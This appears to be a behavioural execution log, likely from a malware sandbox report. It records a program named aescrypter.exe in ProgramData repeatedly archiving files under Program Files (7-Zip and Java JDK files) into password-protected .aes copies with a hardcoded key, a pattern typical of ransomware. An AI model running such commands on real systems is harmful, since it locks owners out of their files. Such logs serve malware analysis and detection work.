C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\pl.txt.aes" "C:\Program Files\7-Zip\Lang\pl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ps.txt.aes" "C:\Program Files\7-Zip\Lang\ps.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\pt-br.txt.aes" "C:\Program Files\7-Zip\Lang\pt-br.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\pt.txt.aes" "C:\Program Files\7-Zip\Lang\pt.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ro.txt.aes" "C:\Program Files\7-Zip\Lang\ro.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ru.txt.aes" "C:\Program Files\7-Zip\Lang\ru.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sa.txt.aes" "C:\Program Files\7-Zip\Lang\sa.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\si.txt.aes" "C:\Program Files\7-Zip\Lang\si.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sk.txt.aes" "C:\Program Files\7-Zip\Lang\sk.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sl.txt.aes" "C:\Program Files\7-Zip\Lang\sl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sq.txt.aes" "C:\Program Files\7-Zip\Lang\sq.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sr-spc.txt.aes" "C:\Program Files\7-Zip\Lang\sr-spc.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sr-spl.txt.aes" "C:\Program Files\7-Zip\Lang\sr-spl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sv.txt.aes" "C:\Program Files\7-Zip\Lang\sv.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sw.txt.aes" "C:\Program Files\7-Zip\Lang\sw.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ta.txt.aes" "C:\Program Files\7-Zip\Lang\ta.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\tg.txt.aes" "C:\Program Files\7-Zip\Lang\tg.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\th.txt.aes" "C:\Program Files\7-Zip\Lang\th.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\tk.txt.aes" "C:\Program Files\7-Zip\Lang\tk.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\tr.txt.aes" "C:\Program Files\7-Zip\Lang\tr.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\tt.txt.aes" "C:\Program Files\7-Zip\Lang\tt.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ug.txt.aes" "C:\Program Files\7-Zip\Lang\ug.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\uk.txt.aes" "C:\Program Files\7-Zip\Lang\uk.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\uz-cyrl.txt.aes" "C:\Program Files\7-Zip\Lang\uz-cyrl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\uz.txt.aes" "C:\Program Files\7-Zip\Lang\uz.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\va.txt.aes" "C:\Program Files\7-Zip\Lang\va.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\vi.txt.aes" "C:\Program Files\7-Zip\Lang\vi.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\yo.txt.aes" "C:\Program Files\7-Zip\Lang\yo.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\zh-cn.txt.aes" "C:\Program Files\7-Zip\Lang\zh-cn.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\zh-tw.txt.aes" "C:\Program Files\7-Zip\Lang\zh-tw.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\License.txt.aes" "C:\Program Files\7-Zip\License.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\readme.txt.aes" "C:\Program Files\7-Zip\readme.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\CompressReset.jpg.aes" "C:\Program Files\CompressReset.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\CompressSearch.rtf.aes" "C:\Program Files\CompressSearch.rtf" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\lib\jvm.hprof.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\README.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\README.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\artifacts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\platform.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

